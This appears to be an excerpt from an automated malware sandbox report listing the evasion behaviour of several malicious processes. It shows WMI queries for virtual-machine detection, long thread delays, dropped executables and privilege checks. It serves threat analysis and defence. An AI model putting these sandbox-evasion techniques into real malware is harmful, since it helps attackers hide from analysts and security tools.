Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Recovery\HpQPPZazcv.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\HpQPPZazcv.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\HpQPPZazcv.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\HpQPPZazcv.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\HpQPPZazcv.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\HpQPPZazcv.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\HpQPPZazcv.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\HpQPPZazcv.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\HpQPPZazcv.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\HpQPPZazcv.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\HpQPPZazcv.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\HpQPPZazcv.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\HpQPPZazcv.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\HpQPPZazcv.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\HpQPPZazcv.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\HpQPPZazcv.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\HpQPPZazcv.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\HpQPPZazcv.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\HpQPPZazcv.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\HpQPPZazcv.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\HpQPPZazcv.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\HpQPPZazcv.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\HpQPPZazcv.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\HpQPPZazcv.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\HpQPPZazcv.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\HpQPPZazcv.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\HpQPPZazcv.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\HpQPPZazcv.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\HpQPPZazcv.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\HpQPPZazcv.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\HpQPPZazcv.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\HpQPPZazcv.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Recovery\HpQPPZazcv.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Recovery\HpQPPZazcv.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Memory allocated: 2720000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Memory allocated: 1A8C0000 memory reserve \| memory write watch
Source: C:\Recovery\HpQPPZazcv.exe	Memory allocated: 1320000 memory reserve \| memory write watch
Source: C:\Recovery\HpQPPZazcv.exe	Memory allocated: 1AE00000 memory reserve \| memory write watch
Source: C:\Recovery\HpQPPZazcv.exe	Memory allocated: 890000 memory reserve \| memory write watch
Source: C:\Recovery\HpQPPZazcv.exe	Memory allocated: 1A6A0000 memory reserve \| memory write watch

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 922337203685477
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 600000
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 599745
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 3600000
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 583656
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 580984
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 579906
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 579422
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 577140
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 576531
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 574172
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 573562
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 572890
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 572375
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 572000
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 571703
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 571375
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 571140
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 570906
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 570751
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 570627
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 568775
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 568562
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 568446
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 568203
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 568020
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 567828
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 567651
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 567527
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 567390
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 565203
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 565053
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 564656
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 564493
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 564381
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 564115
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 563984
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 563875
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 563764
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 563656
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 563542
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 562034
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 561919
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 561812
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 561702
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 561586
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 561467
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 561351
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 560689
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 560578
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 560439
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 560319
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 560199
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 560053
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 558589
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 558481
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 558375
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 558265
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 558155
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 558043
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 557929
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 557811
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 557702
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 557585
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 557479
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 557358
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 557250
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 557139
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 557031
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 556922
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 556812
Source: C:\Recovery\HpQPPZazcv.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2694
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3130
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2399
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2348
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 821
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6424
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 491
Source: C:\Recovery\HpQPPZazcv.exe	Window / User API: threadDelayed 4440
Source: C:\Recovery\HpQPPZazcv.exe	Window / User API: threadDelayed 5107

Source: C:\Recovery\HpQPPZazcv.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\sNdMsyHA.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66642\_sqlite3.pyd	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66642\_bz2.pyd	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\jLnWNQxJ.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66162\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\etRnODSa.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\itfeGmlQ.log	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\nQMnEjGz.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\wPQtSLGm.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66642\_queue.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66642\rar.exe	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66642\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\sTOcLgQt.log	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\VmdPWrri.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66162\python310.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\flhVkUrV.log	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\eodmidm4\eodmidm4.dll	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\JmBJbHgR.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\JryrolxS.log	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\qBrDLwRs.log	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\RXtRpjXE.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66162\_bz2.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66162\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\jHNEqIuO.log	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\oXnVlCHH.log	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\tcMmcUQx.log	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\tKFUOyWv.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66642\unicodedata.pyd	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\JSejfBbH.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\QYTGHhqw.log	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\SUVZKjmy.log	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\djIfBqMY.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66642\python310.dll	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66642\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\bmTftlYf.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\MZFQQyWG.log	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ifKwJWCS.log	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\GLhaJjhM.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66162\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\cACFdGgc.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66162\_decimal.pyd	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\pUOdHCWB.log	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\EqAsTbqX.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\XWHGkwkl.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66642\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\vIRlNZYv.log	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\xiBLBWku.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\xnytOABw.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\KWThvPSL.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\xGttiZnp.log	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\LXhZiUrJ.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\BLFrfvoX.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66642\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\AwjkpWnj.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66642\_socket.pyd	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\FuissdNI.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\IsmZtopJ.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66162\unicodedata.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66162\_socket.pyd	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\eGaXQvvb.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\hwDWkmWW.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ViDyzjon.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66642\_lzma.pyd	Jump to dropped file
Source: C:\Recovery\HpQPPZazcv.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\VuNhAaSo.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI66642\select.pyd	Jump to dropped file
Source: C:\ProgramData\setup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\wYntCyZj.log	Jump to dropped file

Source: C:\ProgramData\Microsoft\hacn.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes			graph_1-16994
Source: C:\ProgramData\Microsoft\based.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes			graph_2-38527

Source: C:\ProgramData\Microsoft\based.exe TID: 3236	Thread sleep count: 53 > 30	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe TID: 3236	Thread sleep time: -53000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7316	Thread sleep count: 2694 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7820	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7700	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7312	Thread sleep count: 3130 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7824	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7696	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7276	Thread sleep count: 2399 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7816	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7712	Thread sleep time: -922337203685477s >= -30000s
